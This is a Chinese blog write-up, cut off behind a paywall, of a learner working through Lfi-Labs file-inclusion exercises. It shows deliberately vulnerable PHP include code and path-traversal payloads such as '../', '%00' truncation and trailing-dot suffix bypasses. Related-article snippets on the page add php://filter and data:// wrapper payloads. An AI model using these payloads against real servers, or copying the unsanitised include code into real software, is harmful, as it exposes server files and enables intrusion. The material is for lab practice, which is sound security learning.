文件包含漏洞靶场练习

最新推荐文章于 2024-05-19 09:10:58 发布
最新推荐文章于 2024-05-19 09:10:58 发布
阅读量1.6k 收藏 16
点赞数 2
分类专栏: 学习记录 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/113799879
版权

目录

Lfi-Labs

说明

该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。

LFI-1

源码:

<?php
include($_GET["page"]);
?>

payload:

?page=phpinfo.php

发现并没用成功,使用 ../ 返回上一级目录
在这里插入图片描述

LFI-2

源码:

<?php
include("includes/".$_GET['library'].".php"); 
?>

这里给输入的文件包含变量都添加了.php后缀。
例:输入phpinfo.php,会变成phpinfo.php.php;这个文件显然不存在。
这里采用%00截断。

payload:

?library=../../phpinfo.php%00

使用%00截断注意的问题:

(1)php版本小于5.3.4。
(2)php的magic_quotes_gpc为OFF状态。

如果两者都满足,还不成功,可以使用burpsuite抓包重放:

但是,我这里还是不行,裂开。

LFI-3

源码:

<?php

if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

这里审计一下,输入参数的最后四位不能是.php
这里利用Windows环境下的特性:在设置文件后缀名时,如果使用后缀名中包含 . 会自动省略。

所以,payload:

?file=../../phpinfo.php.

LFI-4

源码:

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

使用addslashes()函数对参数进行了过滤:

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

单引号(’)
双引号(")
反斜杠(\)
NULL

但是这道题会在末尾自动添加.php的后缀。

payload:

?class=../../../../../phpinfo

LFI-5

源码:

<?php

   $file = str_replace('../', '', $_GET['file']);
   if
最低0.47元/天 解锁文章
「已注销」
关注
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
测试开发必备技能:漏洞靶场,实战训练
zjtdy的博客
05-09 1121
安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的产品、网站更好的保驾护航,而如果心术不正,利用安全漏洞去做一些未法牟利,则容易造成承担不必要的违法责任。 在日常很容易被大家忽略的一点,在非授权的情况下,对网站进行渗透攻击测试,也是属于非合规操作,是触及法律法规的。因此对于大家在学习安全测试过程中,通常建议是直接在本地直接 搭建安全演练靶场环境 ,尽量避免直接对非授权的网站进行测试。 掌握安全测试是测试开发工程师进阶的一项硬技能,今天这篇文章,就
DoraBox靶场(三)文件包含
Lorezon的博客
03-17 235
任意文件包含靶场目录下有个txt文件,可以直接读取 目录限制文件包含 源码有不同的地方 "…/"的含义就是返回上一目录,可以用这种返回层级目录的方式得到信息。 因为靶场的phpinfo文件在两个上层目录,所以输入…/…/phpinfo.php ...
文件包含漏洞--pikachu靶场
最新发布
嘿嘿嘿
05-19 698
2.include "include/$filename"---这是23行的内容也是漏洞的成因,因为将用户的get请求中的参数直接无条件的放入include语句去执行。通过下拉菜单选择球星实际是发送不同的get请求回显对应内容,文件包含漏洞的关键是文件包含函数(include/require)身份对参数有严格定义,因此我们是要找到能调用文件包含的php文件。文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。:在包含文件时,如果找不到包含的文件,它只会产生告警,页面的。
iwebsec靶场文件包含
果粒程
03-02 1134
iwebsec靶场文件包含
DAY15:文件包含漏洞靶场手册(自用 file-include 靶场
qq_49433473的博客
07-27 737
include自搭靶场手册,bug多 伪协议使用,后缀名绕过,路径拼接绕过。。。。
PHP代码审计入门-DVWA靶场文件包含
身高两米不到的博客
11-17 775
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,文章跟随流沙前辈学习记录,看看曾经遥不可及的代码审计能不能慢慢啃下来。首先是low等级,low等级get传参没作任何限制,加之前面inlcude没作任何限制,所以存在任意文件读取和文件包含。impossible就没啥意思了,直接写死,只允许包含存在的三个文件,所以没有办法进行文件包含
java安全漏洞靶场构建文件
07-05
Java安全漏洞靶场构建文件 本资源主要介绍了如何构建一个 Java 安全漏洞靶场,旨在帮助开发者和安全测试人员了解 Java 应用程序中的安全漏洞。该靶场构建文件提供了详细的步骤和环境配置信息,涵盖了 JDK、Tomcat、...
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞练习靶场upload-labs内有文件上传漏洞的各种类型绕过的例题,非常全面,对加深文件上传漏洞的理解、利用非常有帮助。
xsser.7z漏洞练习靶场
01-03
xss漏洞练习
文件上传漏洞练习靶场报告.zip
04-09
资料中详细介绍了如何在练习文件上传漏洞靶场上进行操作。它指出了漏洞的上传点,这是攻击者可以利用的弱点。然后,它详细阐述了具体的操作步骤流程,包括如何找到上传点,如何构造恶意文件,以及如何通过上传恶意...
Java漏洞靶场.zip
01-16
其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗...
DVWA漏洞靶场-文件包含(File Inclusion)
08-02 519
基本知识: php中引发文件包含漏洞的通常是以下四个函数: include() include_once() require() require_once()    require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_...
Pikachu漏洞靶场 File Inclusion(文件包含漏洞
柠檬i的博客
04-06 575
1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。 2.远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。 因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。
Redis数据库的漏洞靶场演练
weixin_42282189的博客
01-10 1088
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 以前只知道redis有未授权访问,redis未授权访问的利用看文章,但自己没有亲手做过,最近接触了一个postgresql的远程命令执行漏洞,我在数据库漏洞利用这块不熟悉,信安之路最近开了数据库的课程,在此记录数据库靶场演练的学习,并分享给大家。 0x02 数据库的安装 2.1 redis安装 下载地址: https://github.com/microsoftarchive/redis/rel.
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 2094
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6163
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。File Inclusion,文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
web入门-文件包含
wo41ge的博客
11-28 3279
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
CTFshow web 文件包含
m0_56993542的博客
10-18 378
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1885
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
pikachu靶场文件包含
10-20
pikachu靶场是一个适用于新手学习WEB安全练习使用的开源靶场,其中包含了文件包含漏洞文件包含漏洞是指在程序中使用了用户可控的文件名或路径,攻击者可以通过构造特定的文件名或路径来读取或执行任意文件,从而实现攻击。在pikachu靶场中,你可以通过模拟攻击来学习如何发现和利用文件包含漏洞,以及如何防范这种漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值